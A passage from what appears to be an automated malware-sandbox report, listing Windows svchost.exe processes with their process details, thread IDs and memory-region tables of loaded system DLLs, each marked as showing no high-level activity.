|
- |
| radardt.dll | 0x7ffaeaf30000 | 0x7ffaeaf4cfff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffaeb520000 | 0x7ffaeb52dfff | Memory Mapped File | rwx |
|
|
|
- |
| trkwks.dll | 0x7ffaeb660000 | 0x7ffaeb681fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.dll | 0x7ffaebb60000 | 0x7ffaebc72fff | Memory Mapped File | rwx |
|
|
|
- |
| pcasvc.dll | 0x7ffaebcf0000 | 0x7ffaebd6ffff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ffaec140000 | 0x7ffaec17efff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffaecef0000 | 0x7ffaecf0cfff | Memory Mapped File | rwx |
|
|
|
- |
| pcadm.dll | 0x7ffaed040000 | 0x7ffaed04ffff | Memory Mapped File | rwx |
|
|
|
- |
| pcacli.dll | 0x7ffaed130000 | 0x7ffaed13efff | Memory Mapped File | rwx |
|
|
|
- |
| httpprxc.dll | 0x7ffaef890000 | 0x7ffaef898fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| wudfplatform.dll | 0x7ffaf0620000 | 0x7ffaf0652fff | Memory Mapped File | rwx |
|
|
|
- |
| wudfsvc.dll | 0x7ffaf0660000 | 0x7ffaf067afff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffaf11d0000 | 0x7ffaf1241fff | Memory Mapped File | rwx |
|
|
|
- |
| audioendpointbuilder.dll | 0x7ffaf1250000 | 0x7ffaf1299fff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ffaf1610000 | 0x7ffaf161bfff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7ffaf1640000 | 0x7ffaf16fffff | Memory Mapped File | rwx |
|
|
|
- |
| portabledeviceconnectapi.dll | 0x7ffaf17b0000 | 0x7ffaf17c6fff | Memory Mapped File | rwx |
|
|
|
- |
| portabledeviceapi.dll | 0x7ffaf17d0000 | 0x7ffaf1870fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffaf2560000 | 0x7ffaf2627fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffaf2b90000 | 0x7ffaf2c07fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ffaf2c40000 | 0x7ffaf2c7efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffaf36d0000 | 0x7ffaf36ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffaf37e0000 | 0x7ffaf3811fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffaf44e0000 | 0x7ffaf4533fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 15 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #46: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #46 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x368 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E70
0x
940
0x
924
0x
91C
0x
910
0x
8A8
0x
398
0x
394
0x
36C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000c299b70000 | 0xc299b70000 | 0xc299b7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xc299b80000 | 0xc299b80fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c299b90000 | 0xc299b90000 | 0xc299ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c299bb0000 | 0xc299bb0000 | 0xc299c2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c299c30000 | 0xc299c30000 | 0xc299c33fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c299c40000 | 0xc299c40000 | 0xc299c40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c299c50000 | 0xc299c50000 | 0xc299c51fff | Private Memory | rw |
|
|
|
- |
| private_0x000000c299c60000 | 0xc299c60000 | 0xc299c60fff | Private Memory | rw |
|
|
|
- |
| private_0x000000c299c70000 | 0xc299c70000 | 0xc299c70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c299c80000 | 0xc299c80000 | 0xc299c80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c299c90000 | 0xc299c90000 | 0xc299c90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c299cc0000 | 0xc299cc0000 | 0xc299cc6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000c299d00000 | 0xc299d00000 | 0xc299dfffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xc299e00000 | 0xc299ebdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c299f40000 | 0xc299f40000 | 0xc299ffffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c29a050000 | 0xc29a050000 | 0xc29a056fff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29a060000 | 0xc29a060000 | 0xc29a0dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29a100000 | 0xc29a100000 | 0xc29a1fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c29a200000 | 0xc29a200000 | 0xc29a387fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c29a390000 | 0xc29a390000 | 0xc29a510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c29a520000 | 0xc29a520000 | 0xc29a61ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29a620000 | 0xc29a620000 | 0xc29a71ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29a720000 | 0xc29a720000 | 0xc29a81ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xc29a820000 | 0xc29ab56fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000c29ab60000 | 0xc29ab60000 | 0xc29ac5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29ac60000 | 0xc29ac60000 | 0xc29ad5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29ad60000 | 0xc29ad60000 | 0xc29ae5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c29af60000 | 0xc29af60000 | 0xc29b05ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffa50000 | 0x7df5ffa50000 | 0x7ff5ffa4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff787054000 | 0x7ff787054000 | 0x7ff787055fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78705a000 | 0x7ff78705a000 | 0x7ff78705bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78705c000 | 0x7ff78705c000 | 0x7ff78705dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78705e000 | 0x7ff78705e000 | 0x7ff78705ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff787060000 | 0x7ff787060000 | 0x7ff78715ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787160000 | 0x7ff787160000 | 0x7ff787182fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff787184000 | 0x7ff787184000 | 0x7ff787185fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787186000 | 0x7ff787186000 | 0x7ff787187fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787188000 | 0x7ff787188000 | 0x7ff787188fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78718a000 | 0x7ff78718a000 | 0x7ff78718bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78718c000 | 0x7ff78718c000 | 0x7ff78718dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78718e000 | 0x7ff78718e000 | 0x7ff78718ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| ssdpsrv.dll | 0x7ffae6210000 | 0x7ffae6250fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffae8710000 | 0x7ffae8752fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7ffaec7b0000 | 0x7ffaec7b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7ffaec7c0000 | 0x7ffaec7c7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x7ffaec7d0000 | 0x7ffaec7d9fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffaf07f0000 | 0x7ffaf0809fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffaf0810000 | 0x7ffaf0825fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffaf11d0000 | 0x7ffaf1241fff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ffaf1610000 | 0x7ffaf161bfff | Memory Mapped File | rwx |
|
|
|
- |
| timebrokerserver.dll | 0x7ffaf18f0000 | 0x7ffaf191cfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffaf2560000 | 0x7ffaf2627fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ffaf2c40000 | 0x7ffaf2c7efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ffaf2ef0000 | 0x7ffaf2fddfff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffaf3170000 | 0x7ffaf31a1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffaf31b0000 | 0x7ffaf3231fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #47: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #47 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalService |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3a4 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
420
0x
798
0x
748
0x
70C
0x
6F8
0x
6F4
0x
6F0
0x
6DC
0x
6B4
0x
6A4
0x
598
0x
594
0x
584
0x
46C
0x
134
0x
234
0x
12C
0x
3F4
0x
3F0
0x
3EC
0x
3A8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000e733c40000 | 0xe733c40000 | 0xe733c4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xe733c50000 | 0xe733c50fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000e733c60000 | 0xe733c60000 | 0xe733c73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e733c80000 | 0xe733c80000 | 0xe733cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e733d00000 | 0xe733d00000 | 0xe733d03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000e733d10000 | 0xe733d10000 | 0xe733d10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e733d20000 | 0xe733d20000 | 0xe733d21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xe733d30000 | 0xe733dedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000e733df0000 | 0xe733df0000 | 0xe733df6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e733e00000 | 0xe733e00000 | 0xe733efffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e733f80000 | 0xe733f80000 | 0xe73403ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e734040000 | 0xe734040000 | 0xe734046fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734050000 | 0xe734050000 | 0xe734050fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734060000 | 0xe734060000 | 0xe734060fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e734070000 | 0xe734070000 | 0xe734070fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e734080000 | 0xe734080000 | 0xe7340fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734100000 | 0xe734100000 | 0xe7341fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e734200000 | 0xe734200000 | 0xe734387fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000e734390000 | 0xe734390000 | 0xe734510fff | Pagefile Backed Memory | r |
|
|
|
- |
| ~fontcache-system.dat | 0xe734520000 | 0xe734595fff | Memory Mapped File | rw |
|
|
|
- |
| es.dll | 0xe7345a0000 | 0xe7345b1fff | Memory Mapped File | r |
|
|
|
- |
| stdole2.tlb | 0xe7345c0000 | 0xe7345c4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000e7345d0000 | 0xe7345d0000 | 0xe7345d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| netprofmsvc.dll.mui | 0xe7345e0000 | 0xe7345e1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000e7345f0000 | 0xe7345f0000 | 0xe7345f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0xe734620000 | 0xe734956fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000e734960000 | 0xe734960000 | 0xe734a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734a60000 | 0xe734a60000 | 0xe734b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734b60000 | 0xe734b60000 | 0xe734c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734c60000 | 0xe734c60000 | 0xe734d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734d60000 | 0xe734d60000 | 0xe734e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e734e60000 | 0xe734e60000 | 0xe734f5ffff | Private Memory | rw |
|
|
|
- |
| ~fontcache-fontface.dat | 0xe734f60000 | 0xe735f5ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000e735f60000 | 0xe735f60000 | 0xe73605ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e736060000 | 0xe736060000 | 0xe73615ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e736a60000 | 0xe736a60000 | 0xe736b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e736b60000 | 0xe736b60000 | 0xe736c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e736d00000 | 0xe736d00000 | 0xe736dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e736e00000 | 0xe736e00000 | 0xe736efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e736f00000 | 0xe736f00000 | 0xe736ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737000000 | 0xe737000000 | 0xe7370fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737200000 | 0xe737200000 | 0xe7372fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737300000 | 0xe737300000 | 0xe7373fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737400000 | 0xe737400000 | 0xe7374fffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0xe737500000 | 0xe7375defff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000e7375e0000 | 0xe7375e0000 | 0xe7376dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737800000 | 0xe737800000 | 0xe7378fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737a00000 | 0xe737a00000 | 0xe737afffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737c00000 | 0xe737c00000 | 0xe737cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e737d00000 | 0xe737d00000 | 0xe737dfffff | Private Memory | rw |
|
|
|
- |
| ~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat | 0xe737e00000 | 0xe7385fffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00007df5ff870000 | 0x7df5ff870000 | 0x7ff5ff86ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7877a6000 | 0x7ff7877a6000 | 0x7ff7877a7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877a8000 | 0x7ff7877a8000 | 0x7ff7877a9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877ac000 | 0x7ff7877ac000 | 0x7ff7877adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877b2000 | 0x7ff7877b2000 | 0x7ff7877b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877b4000 | 0x7ff7877b4000 | 0x7ff7877b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877b6000 | 0x7ff7877b6000 | 0x7ff7877b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877b8000 | 0x7ff7877b8000 | 0x7ff7877b9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877bc000 | 0x7ff7877bc000 | 0x7ff7877bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877be000 | 0x7ff7877be000 | 0x7ff7877bffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877c0000 | 0x7ff7877c0000 | 0x7ff7877c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877c2000 | 0x7ff7877c2000 | 0x7ff7877c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877c4000 | 0x7ff7877c4000 | 0x7ff7877c5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877c8000 | 0x7ff7877c8000 | 0x7ff7877c9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877ca000 | 0x7ff7877ca000 | 0x7ff7877cbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877cc000 | 0x7ff7877cc000 | 0x7ff7877cdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7877ce000 | 0x7ff7877ce000 | 0x7ff7877cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7877d0000 | 0x7ff7877d0000 | 0x7ff7878cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7878d0000 | 0x7ff7878d0000 | 0x7ff7878f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7878f3000 | 0x7ff7878f3000 | 0x7ff7878f4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7878f5000 | 0x7ff7878f5000 | 0x7ff7878f6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7878f7000 | 0x7ff7878f7000 | 0x7ff7878f8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7878f9000 | 0x7ff7878f9000 | 0x7ff7878fafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7878fb000 | 0x7ff7878fb000 | 0x7ff7878fbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7878fe000 | 0x7ff7878fe000 | 0x7ff7878fffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| bluetoothapis.dll | 0x7ffaeafb0000 | 0x7ffaeafcdfff | Memory Mapped File | rwx |
|
|
|
- |
| bthtelemetry.dll | 0x7ffaeafd0000 | 0x7ffaeafdcfff | Memory Mapped File | rwx |
|
|
|
- |
| bthradiomedia.dll | 0x7ffaeafe0000 | 0x7ffaeaff7fff | Memory Mapped File | rwx |
|
|
|
- |
| wlanradiomanager.dll | 0x7ffaeb500000 | 0x7ffaeb513fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffaeb520000 | 0x7ffaeb52dfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofmsvc.dll | 0x7ffaeb570000 | 0x7ffaeb5fcfff | Memory Mapped File | rwx |
|
|
|
- |
| perftrack.dll | 0x7ffaeb640000 | 0x7ffaeb657fff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ffaeb690000 | 0x7ffaeb6eefff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ffaec410000 | 0x7ffaec419fff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffaecef0000 | 0x7ffaecf0cfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffaef620000 | 0x7ffaef6f5fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffaf07f0000 | 0x7ffaf0809fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffaf0810000 | 0x7ffaf0825fff | Memory Mapped File | rwx |
|
|
|
- |
| nsisvc.dll | 0x7ffaf0ab0000 | 0x7ffaf0abbfff | Memory Mapped File | rwx |
|
|
|
- |
| fontprovider.dll | 0x7ffaf0c00000 | 0x7ffaf0c28fff | Memory Mapped File | rwx |
|
|
|
- |
| fntcache.dll | 0x7ffaf0c30000 | 0x7ffaf0dd3fff | Memory Mapped File | rwx |
|
|
|
- |
| es.dll | 0x7ffaf1590000 | 0x7ffaf1609fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ffaf1b70000 | 0x7ffaf1b87fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
